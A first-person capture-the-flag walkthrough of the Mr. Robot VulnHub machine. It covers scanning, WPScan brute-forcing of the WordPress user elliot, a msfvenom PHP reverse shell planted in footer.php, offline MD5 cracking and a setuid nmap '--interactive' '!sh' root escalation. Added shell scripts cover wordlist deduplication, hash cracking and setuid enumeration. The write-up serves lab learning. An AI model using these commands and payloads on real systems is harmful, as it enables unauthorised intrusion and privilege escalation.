Mr. Robot – CTF

This is my walk-through of the Mr. Robot CTF challenge posted on vulnhub.com. All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law. Be smart, folks, and enjoy the walk-through.

Full Nmap scan of the host (all 65535 TCP ports, with service and OS detection via -A):

root@kali:~# nmap -p- -A 192.168.1.224

[screenshot: robot1]

The Nmap scan shows ports 80 and 443 open. A quick check with a browser: lots to read, and videos too:

[screenshot: robot2]

A Nikto scan against port 80 tells us that the site is running WordPress, and that there is a robots.txt file:

root@kali:~# nikto -h http://192.168.1.224

[screenshot: robot3]

Using curl to view robots.txt:

root@kali:~# curl -i -L http://192.168.1.224/robots.txt

[screenshot: robot4]

The robots.txt file contains two entries: our first key, and a dictionary file.

Using curl to view our first key:

root@kali:~# curl -i -L http://192.168.1.224/key-1-of-3.txt

[screenshot: robot5]

Downloading the dictionary file using wget:

root@kali:~/Downloads# wget http://192.168.1.224/fsocity.dic

[screenshot: robot6]

So we have our first key; where to now? I know that the site is running WordPress, and I have a dictionary file that I will assume contains the password for a WordPress user. I ran WPScan and didn't find anything of use. I tried to enumerate users using both WPScan and Metasploit, but no luck. I tried to brute-force the admin user with the dictionary file I downloaded, but that did not work either. So now what?

I went back and revisited the website, watched all the videos and viewed the source of all of the pages, and I found something of interest. Go back to the main site, type prepare, and watch the video:

[screenshot: robot7]

The video makes reference to a website, whoismrrobot.com. I visited the site, and one thing stood out on the main page: the name Elliot is listed as a command. Elliot is the main character in the series. I think we have found our WordPress user:

[screenshot: robot8]

I used WPScan to brute-force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot's password is ER28-0652:

root@kali:~# wpscan -u http://192.168.1.224 --wordlist /root/Downloads/fsocity.dic --username elliot -t 10

[screenshot: robot9]

[screenshot: robot10]
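Most of the time that brute-force run spends is wasted: fsocity.dic is about 858,000 lines, but only around 11,500 of them are unique, so deduplicating the list first cuts the job to a fraction of the work. The following shell example is added here and is not part of the original walkthrough; the function names, the constructed sample wordlist and the temporary paths are my own, and the WPScan invocation in the trailing comment uses the flag syntax of current WPScan releases (--url, --usernames, --passwords) rather than the older syntax shown above.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: deduplicate the wordlist
# before brute-forcing. Most of fsocity.dic is repeated entries, so the unique
# list is a small fraction of the file and the WPScan run finishes far sooner.

# dedupe_wordlist IN OUT: write the unique, non-empty lines of IN to OUT and
# print the number of candidates that remain.
dedupe_wordlist() {
    sort -u "$1" | grep -v '^$' > "$2"
    wc -l < "$2" | tr -d ' '
}

# count_lines FILE: print the line count of FILE, for the before/after comparison.
count_lines() {
    wc -l < "$1" | tr -d ' '
}

# Stand-alone demo on a constructed wordlist (not the real fsocity.dic).
demo_dir=$(mktemp -d)
printf 'alpha\nbeta\nalpha\nER28-0652\nbeta\nalpha\n' > "$demo_dir/fsocity.dic"
before=$(count_lines "$demo_dir/fsocity.dic")
after=$(dedupe_wordlist "$demo_dir/fsocity.dic" "$demo_dir/fsocity-unique.dic")
echo "$before candidates before, $after after deduplication"
rm -rf "$demo_dir"

# On the real file, then feed the unique list to WPScan (current flag syntax):
#   dedupe_wordlist /root/Downloads/fsocity.dic /root/Downloads/fsocity-unique.dic
#   wpscan --url http://192.168.1.224 --usernames elliot --passwords /root/Downloads/fsocity-unique.dic
```

The same dedupe is worth doing on any wordlist pulled off a target: attackers who drop lists on a box rarely clean them, and every duplicate is a login attempt that also shows up in the target's logs for nothing.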

Logged into WordPress using Elliot's credentials:

[screenshot: robot11]

Elliot has admin privileges in WordPress, so the theme editor is available. An easy way to get a shell is to generate a PHP reverse shell payload with msfvenom and add it to one of the theme's PHP files. In my case I will add my PHP code to footer.php. Keep in mind that footer.php is included on every page of the site, so the payload fires for any visitor, not just for my own request; in a lab that is fine, but on a real engagement a dedicated file or a rarely used template is the less disruptive choice, and the edit should be reverted when done.

Creating the reverse shell payload with msfvenom (the raw output is PHP source):

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.233 LPORT=443 -f raw

[screenshot: robot12]

Pasting my PHP code into the footer.php file. You can navigate there by clicking Appearance > Editor > footer.php:

[screenshot: robot13]

Now that I have the payload in place, I fire up my Metasploit handler (exploit/multi/handler, configured with the same payload, LHOST and LPORT as the msfvenom command) to receive the shell. You can see my options below:

[screenshot: robot14]

I trigger the payload by requesting the site with curl (any page that includes footer.php will do):

[screenshot: robot15]

Received the shell with Metasploit:

[screenshot: robot16]

So now I have a low-privilege shell. Poking around a bit, I find key 2, but I don't have privileges to view it. I also find a file that contains the username robot and an MD5 password hash:

[screenshot: robot17]

I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:

[screenshot: robot18]
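A public lookup site is convenient in a lab, but pasting a hash from a client's system into a third-party website leaks it, so on a real engagement the hash should be cracked offline (John the Ripper handles this with john --format=raw-md5 --wordlist=fsocity.dic hash.txt, as does hashcat). The shell example below is added here and is not part of the original walkthrough; it does the same thing with nothing but md5sum, which is enough for an unsalted MD5 and a small wordlist. The function names, the constructed wordlist and the temporary paths are my own; the hash in the demo is the MD5 of abcdefghijklmnopqrstuvwxyz (an RFC 1321 test vector), which is the robot password recovered above.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: crack the robot user's
# raw MD5 hash offline against a wordlist instead of pasting it into a
# public lookup site.

# md5_of STRING: print the lowercase hex MD5 of STRING. printf '%s' is used so
# no trailing newline is hashed, matching how john/hashcat treat wordlist lines.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | md5      # BSD/macOS prints the bare digest for stdin
    fi
}

# crack_md5 HASH WORDLIST: print the first candidate in WORDLIST whose MD5
# equals HASH and return 0; return 1 when nothing matches. HASH may be upper
# or lower case.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        [ -n "$word" ] || continue
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Stand-alone demo with a constructed wordlist (not the real fsocity.dic).
# ROBOT_HASH is MD5("abcdefghijklmnopqrstuvwxyz"), the RFC 1321 test vector.
ROBOT_HASH=c3fcd3d76192e4007dfb496cca67e13b
demo_list=$(mktemp)
printf 'password\n123456\nER28-0652\nabcdefghijklmnopqrstuvwxyz\nletmein\n' > "$demo_list"
if pw=$(crack_md5 "$ROBOT_HASH" "$demo_list"); then
    echo "robot:$pw"
else
    echo "no match in wordlist"
fi
rm -f "$demo_list"
```

Spawning md5sum once per candidate is slow for a large list; it is fine for the deduplicated fsocity.dic, and for anything bigger john or hashcat is the right tool. The point of the example is the workflow: the hash never leaves the machine you control.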

I su to robot, and I am able to view key 2 (su needs a terminal; if the shell you landed in has none, spawn one first, for example with python -c 'import pty; pty.spawn("/bin/bash")'):

[screenshot: robot19]

Poking around a bit more: there is a root folder. I am assuming key 3 is there, so we need to escalate privileges on this host. I download linuxprivchecker.py to the host and run it. Immediately, I find something interesting:

[screenshot: robot20]

I run Nmap in interactive mode and drop to a shell with !sh, which runs with root privileges because the nmap binary on this host is setuid root. This escape only exists in older Nmap releases that still ship --interactive, which is why the version matters as much as the setuid bit. I find key 3 in the root folder as expected:

robot@linux:/tmp$ nmap --interactive

[screenshot: robot21]
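The setuid enumeration that linuxprivchecker.py automates, together with the version check that decides whether the Nmap escape will work, as an added shell example that is not part of the original walkthrough. The function names (find_suid, is_setuid_root, nmap_has_interactive, suid_nmap_check) and the constructed demo directory are my own; the version range is the one GTFOBins documents for Nmap's interactive mode (2.02 through 5.21). The !sh escape itself appears only in a comment, since it needs the vulnerable binary to do anything.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: the setuid check that
# linuxprivchecker.py automates, plus a version check for the nmap escape.

# find_suid DIR: print setuid regular files under DIR, one per line, sorted.
# On a target this is run as: find_suid /
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_setuid_root FILE: succeed when FILE is setuid and owned by uid 0.
is_setuid_root() {
    [ -u "$1" ] || return 1
    # ls -ln prints the numeric owner in field 3 on both GNU and BSD.
    owner=$(ls -ln "$1" | awk '{print $3}')
    [ "$owner" = "0" ]
}

# nmap_has_interactive VERSION: succeed for releases that still ship
# --interactive (GTFOBins lists 2.02 through 5.21). Accepts "3.81", "5.21RC1".
nmap_has_interactive() {
    major=${1%%.*}
    rest=${1#*.}
    minor=$(printf '%s' "${rest%%.*}" | sed 's/[^0-9].*//')
    [ -n "$minor" ] || minor=0
    case "$major" in
        2)   [ "$minor" -ge 2 ] ;;
        3|4) return 0 ;;
        5)   [ "$minor" -le 21 ] ;;
        *)   return 1 ;;
    esac
}

# suid_nmap_check: report whether an installed nmap is setuid root and old
# enough to still have --interactive. If both hold, the root shell is:
#   nmap --interactive
#   nmap> !sh
suid_nmap_check() {
    bin=$(command -v nmap 2>/dev/null) || { echo "nmap not installed"; return 1; }
    ver=$(nmap --version 2>/dev/null | sed -n 's/.*[Vv]ersion \([0-9][0-9.A-Za-z]*\).*/\1/p' | head -n 1)
    if is_setuid_root "$bin" && nmap_has_interactive "$ver"; then
        echo "$bin is setuid root and version $ver has --interactive: run 'nmap --interactive' then '!sh'"
        return 0
    fi
    setuid=no
    is_setuid_root "$bin" && setuid=yes
    echo "$bin: setuid root? $setuid; version ${ver:-unknown}"
    return 1
}

# Stand-alone demo on a constructed directory (not a real target): one normal
# file and one file with the setuid bit set.
demo=$(mktemp -d)
touch "$demo/normal" "$demo/suidbin"
chmod 755 "$demo/normal"
chmod 4755 "$demo/suidbin"
echo "setuid files under $demo:"
find_suid "$demo"
rm -rf "$demo"
suid_nmap_check || true
```

On a current system find_suid / will still list nmap if someone has set the bit, but suid_nmap_check will report the version as too new for the interactive escape; that is the case where the setuid finding is real but this particular escalation is not, and other techniques (NSE scripts, for instance) have to be assessed instead.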

Hope you found this helpful 🙂
